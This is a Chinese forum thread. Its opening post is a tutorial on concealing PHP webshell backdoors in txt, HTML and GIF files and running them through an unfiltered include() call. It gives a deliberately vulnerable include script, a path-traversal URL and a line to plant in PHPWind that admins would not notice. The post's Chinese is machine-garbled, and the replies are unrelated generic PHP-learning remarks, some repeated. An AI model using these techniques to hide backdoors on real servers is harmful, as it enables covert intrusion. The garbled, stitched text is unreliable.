仓酷云

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 2186|回复: 19
打印 上一主题 下一主题

[学习教程] PHP网页设计黑客经历谈Php后门的埋没技能测试呈报

[复制链接]
再现理想 该用户已被删除
跳转到指定楼层
楼主
发表于 2015-2-4 00:00:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
怎么培养啊 别光说不练啊,好 ,比如新人入门自己步是配置环境,虽然现在都有很多的集成环境,但是真实的体验下配置环境还是会有很多帮助,不论是你以后工作还是在真实的linux下开发。     比来良多伴侣都在问我是不是能把我那一句话木马埋没到HTML或图片里,其实把一句话木马拔出到PHP文件中就已很荫蔽了,假如说硬是要放到HTML文件或图片里,就接着往下看这篇的篇测试呈报吧。要晓得假如光把PHP语句放到图片里是不管若何也不克不及履行的,由于PHP只解析扩大名为php的文件。所以说要能使埋没在图片里的PHP语句履行。咱们就的借助PHP中的挪用函数 :include 、require 等。
  咱们还记得前些日子把木马埋没到图片的文章吧。也就是在PHP文件里用include("x.gif")如许的语句来挪用埋没在图片的木马语句。ASP中语句也相似。看似十分荫蔽但直接挪用图片对略微懂点PHP的人就不难发明可疑的地方。因为URL 里用GET体例很难传递参数,这就使得拔出木马的功能得不到发扬。
  Include 函数在PHP中利用的对照频仍,所以引发的平安成绩也其实太多,例如PHPWIND1.36的破绽就是由于include前面的变量没做过滤引发的。由此咱们就能够机关相似的语句来拔出到PHP文件中。然后把木马埋没到图片或HTML文件里,可以说荫蔽性就更高了。如在PHPWIND服装论坛里拔出上面的语句:<‘’?@include includ/.$PHPWIND_ROOT;? > 普通办理员是没法看出来的。
  有了include 函数来帮助协助咱们就能够把PHP木马埋没到 诸如 txt、html和图片文件等良多类型的文件里来了。由于txt、html和图片文件这三品种型的文件最不管在服装论坛仍是文章体系里是最为罕见的了,上面咱们就顺次来做测试。
  起首创立一PHP文件test.php 文件内容为:   
  
  $test=$_GET['test'];
  @include 'test/'.$test;
  ?>   
  Txt文件普通都是申明文件,所以咱们把一句话木马放到目次的申明文件里就OK了。随意创立一个TXT文件t.txt。咱们把一句话木马粘贴到t.txt文件里。然后会见 http://localhost/test/test.php?test=../t.txt 假如你看到t.txt的内容就证实Ok了, 然后把在lanker微型PHP后食客户端 木马地址添入 http://localhost/test/test.php?test=../t.txt 暗码里添入cmd就能够了,履行前往的了局都可以看到。   
  关于HTML的文件,普通都为模版文件。为了使拔出到HTML的文件的木马能被挪用履行并且不被显示出来,咱们可以在HTML里到场一个埋没属性的文本框 ,如: 然后利用办法同上。履行的前往了局普通都可以检查源文件看到。 如利用检查本法式目次功效。检查源文件内容为 我可以失掉目次为 C:\Uniserver2_7s\www\test。
  上面咱们说说图片文件,要说最为毒的一招莫过于把木马埋没到图片里。咱们可以直接对一个图片停止编纂,把拔出到图片末尾  
  经测试普通都不会对图片形成影响。然后一样办法客户端木马地址添入
  咱们检查PHP情况变量 前往的是了局是原图片。 
  这里能够要和咱们想象的了局有些差距了,其实号令已运转了,只是前往的了局看不到罢了,由于这是真实的GIF文件,所所以不会显示前往了局的,为了证实是不是真的履行了号令咱们 履行上传文件号令。果不出所料,文件已胜利上传到办事器上。如许捏造的长处是荫蔽性好。弱点也天然不必说了是没回显。假如你想看到前往的了局,那就拿出记事本捏造一个假的图片文件吧。
  到这里就根基测试完了,如何荫蔽PHP后门就看你本人的选择了。行文仓皇,若有不当的地方,请指出!
虽说不上很好,但至少一般的数据操作,再在原有的SQL语言的基础上,用得还是可以的。
愤怒的大鸟 该用户已被删除
沙发
发表于 2015-2-4 08:00:58 | 只看该作者
至于模板嘛,各位高人一直以来就是争论不休,我一只小菜鸟就不加入战团啦,咱们新手还是多学点东西的好。
深爱那片海 该用户已被删除
板凳
发表于 2015-2-9 19:34:59 | 只看该作者
刚开始安装php的时候,我图了个省事,把php的扩展全都打开啦(就是把php.ini 那一片 extension 前面的冒号全去掉啦),这样自然有好处,以后不用再需要什么功能再来打开。
柔情似水 该用户已被删除
地板
发表于 2015-2-9 22:38:25 | 只看该作者
个人呢觉得,配wamp 最容易漏的一步就是忘了把$PHP$目录下的libmysql.dll拷贝到windows系统目录的system32目录下,还有重启apache。
admin 该用户已被删除
5#
发表于 2015-2-28 02:57:07 | 只看该作者
我要在声明一下:我是个菜鸟!!我对php这门优秀的语言也是知之甚少。但是我要在这里说一下php在网站开发中最常用的几个功能:
再现理想 该用户已被删除
6#
 楼主| 发表于 2015-3-8 15:12:02 | 只看该作者
装在C盘下面可以利用windows的ghost功能可以还原回来(顺便当做是重转啦),当然啦我的编译目录要放在别的盘下,不然自己的劳动成果就悲剧啦。
第二个灵魂 该用户已被删除
7#
发表于 2015-3-16 02:43:19 | 只看该作者
我还是强烈建议自己搭建php环境。因为在搭建的过程中你会遇到一些问题,通过搜索或是看php手册解决问题后,你会更加深刻的理解它们的工作原理,了解到php配置文件中的一些选项设置。
小魔女 该用户已被删除
8#
发表于 2015-3-17 02:19:09 | 只看该作者
最后祝愿,php会给你带来快乐的同时 你也会给他带来快乐。
不帅 该用户已被删除
9#
发表于 2015-3-20 15:19:34 | 只看该作者
不禁又想起那些说php是草根语言的人,为什么认得差距这么大呢。
若天明 该用户已被删除
10#
发表于 2015-4-1 01:09:32 | 只看该作者
php里的数组为空的时候是不能拿来遍历的;(这个有点低级啊,不过我刚被这个边界问题墨迹了好长一会)
分手快乐 该用户已被删除
11#
发表于 2015-4-2 12:06:34 | 只看该作者
爱上php,他也会爱上你。
谁可相欹 该用户已被删除
12#
发表于 2015-4-2 14:52:05 | 只看该作者
多看优秀程序员编写的代码,仔细理解他们解决问题的方法,对自身有很大的帮助。
老尸 该用户已被删除
13#
发表于 2015-4-6 09:04:03 | 只看该作者
本文当是我的笔记啦,遇到的问题随时填充
因胸联盟 该用户已被删除
14#
发表于 2015-4-9 04:13:57 | 只看该作者
在学习的过程中不能怕麻烦,不能有懒惰的思想。学习php首先应该搭建一个lamp环境或者是wamp环境。这是学习php开发的根本。虽然网络上有很多集成的环境,安装很方便,使用起来也很稳定、
爱飞 该用户已被删除
15#
发表于 2015-4-21 03:53:00 | 只看该作者
装在C盘下面可以利用windows的ghost功能可以还原回来(顺便当做是重转啦),当然啦我的编译目录要放在别的盘下,不然自己的劳动成果就悲剧啦。
小女巫 该用户已被删除
16#
发表于 2015-4-25 16:50:22 | 只看该作者
学习php的目的往往是为了开发动态网站,phper就业的要求也涵盖了很多。我大致总结为:精通php和mysql
变相怪杰 该用户已被删除
17#
发表于 2015-6-14 20:14:27 | 只看该作者
在我安装pear包的时候老是提示,缺少某某文件,才发现 那群extension 的排列是应该有一点的顺序,而我安装的版本的排序不是正常的排序。没办法我只好把那群冒号加了上去,只留下我需要使用的扩展。
18#
发表于 2015-6-27 02:30:08 | 只看该作者
微软最近出的新字体“微软雅黑”,虽然是挺漂亮的,不过firefox  支持的不是很好,所以能少用还是少用的好。
再见西城 该用户已被删除
19#
发表于 2015-7-10 05:27:42 | 只看该作者
刚开始安装php的时候,我图了个省事,把php的扩展全都打开啦(就是把php.ini 那一片 extension 前面的冒号全去掉啦),这样自然有好处,以后不用再需要什么功能再来打开。
乐观 该用户已被删除
20#
发表于 2015-7-11 17:50:23 | 只看该作者
基础有没有对学习php没有太大区别,关键是兴趣。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|仓酷云 鄂ICP备14007578号-2

GMT+8, 2024-12-29 07:20

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表